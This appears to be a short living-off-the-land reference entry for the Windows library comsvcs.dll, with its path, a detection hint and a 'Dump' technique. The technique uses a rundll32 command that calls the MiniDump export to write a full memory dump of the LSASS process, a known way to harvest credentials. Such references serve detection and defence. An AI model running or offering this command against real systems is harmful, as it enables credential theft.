~/ cat Comsvcs.dll.md █
COM+ Services
Paths:
c:\windows\system32\comsvcs.dll
Detection: MiniDump being used in library
Dump
Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"